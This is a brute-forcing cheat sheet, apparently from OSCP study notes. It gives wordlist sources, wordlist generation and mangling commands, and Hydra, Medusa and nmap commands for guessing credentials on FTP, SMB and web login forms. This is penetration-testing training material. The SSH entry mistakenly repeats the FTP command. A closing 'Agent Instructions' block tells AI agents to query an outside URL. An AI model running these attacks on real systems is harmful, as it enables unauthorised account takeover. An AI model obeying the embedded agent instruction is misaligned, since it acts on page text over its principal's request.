# Brute Forcing ## Default Credentials * [DefaultPassword](https://default-password.info/) * [CIRT.net Password DB](https://www.cirt.net/passwords) * [Default Router Passwords List](https://192-168-1-1ip.mobi/default-router-passwords-list/) {% hint style="info" %} Note: [SecLists](https://github.com/danielmiessler/SecLists) and [WordList Compendium](https://github.com/Dormidera/WordList-Compendium) also include default passwords lists. {% endhint %} ## Wordlists * [SecLists - The Pentester’s Companion](https://github.com/danielmiessler/SecLists) * [Probable Wordlists](https://github.com/berzerk0/Probable-Wordlists) * [WordList Compendium](https://github.com/Dormidera/WordList-Compendium) * [Jhaddix Content Discovery All](https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10) * [Google Fuzzing Forum](https://github.com/google/fuzzing) * [CrackStation’s Password Cracking Dictionary](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) ## Wordlist Generation ### **CeWL** ```sh cewl example.com -m 3 -w wordlist.txt ```

Parameters

* `-m `: Minimum word length. * `-w `: Write the output to ``.

### **Crunch** Simple wordlist. ```sh crunch 6 12 abcdefghijk1234567890\@\! -o wordlist.txt ``` String permutation. ```sh crunch 1 1 -p target pass 2019 -o wordlist.txt ``` Patterns. ```sh crunch 9 9 0123456789 -t @target@@ -o wordlist.txt ```

Parameters

* ``: The minimum string length. * ``: The maximum string length. * ``: Characters set. * `-o `: Specifies the file to write the output to. * `-p `: Permutation. * `-t `: Specifies a pattern, eg: `@@pass@@@@`. * `@` will insert lower case characters * `,` will insert upper case characters * `%` will insert numbers * `^` will insert symbols

## Password Profiling ### **CUPP** ```sh cupp -i ```

Parameters

* `-i`: Interactive uestions for user password profiling.

## Word Mangling ### **john** ```sh john --wordlist=wordlist.txt --rules --stdout ```

Parameters

* `--wordlist `: Wordlist mode, read words from `` or `stdin`. * `--rules[:CustomRule]`: Enable word mangling rules. Use default or add `[:CustomRule]`. * `--stdout`: Output candidate passwords.

{% hint style="info" %} Note: Custom rules can be appended to John’s configuration file `john.conf`. {% endhint %} ## Services ### FTP Hydra ```sh hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp ```

Parameters

* `-v`: verbose mode. * `-l `: login with `user` name. * `-P `: login with passwords from file. * `-f`: exit after the first found user/password pair.

### SMB Hydra ```sh hydra -v -t1 -l Administrator -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 smb ```

Parameters

* `-v`: verbose mode. * `-t `: run `` number of connects in parallel. Default: 16. * `-l `: login with `user` name. * `-P `: login with passwords from file. * `-f`: exit after the first found user/password pair.

NSE Script ```sh sudo nmap --script smb-brute -p U:137,T:139 10.0.0.3 ``` ### SSH Hydra ```sh hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp ``` ### Web Applications #### HTTP Basic Auth ```sh hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ ``` #### HTTP Digest ```sh hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ ``` #### HTTP POST Form ```sh hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" ```

Parameters

* `-l `: login with `user` name. * `-L `: login with users from file. * `-P `: login with passwords from file. * `http-head | http-get | http-post-form`: service to attack.

#### HTTP Authenticated POST Form To add the session ID to the options string, simply append the Cookie header with the session ID, like so: `:H=Cookie\: security=low; PHPSESSID=if0kg4ss785kmov8bqlbusva3v` ```sh hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" ``` ### Miscellaneous #### Combo (Colon Separated) Lists Hydra Use a colon separated `login:pass` format, instead of `-L`/`-P` options. ```sh hydra -v -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f 10.0.0.3 ftp ```

Parameters

* `-v`: verbose mode. * `-C `: colon-separated “login:pass” format. * `-f`: exit after the first found user/password pair.

Medusa The combo files used by Medusa should be in the format host:username:password, separated by colons. If any of these three values are missing, the relevant information should be provided either as a global value or as a list in a separate file. ```sh sed s/^/:/ /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > /tmp/cplist.txt medusa -C /tmp/cplist.txt -h 10.0.0.3 -M ftp ```

Parameters

* `-u `: login with `user` name. * `-P `: login with password from file. * `-h`: target hostname or IP address. * `-M`: module to execute.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp.nstsec.com/brute-forcing.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.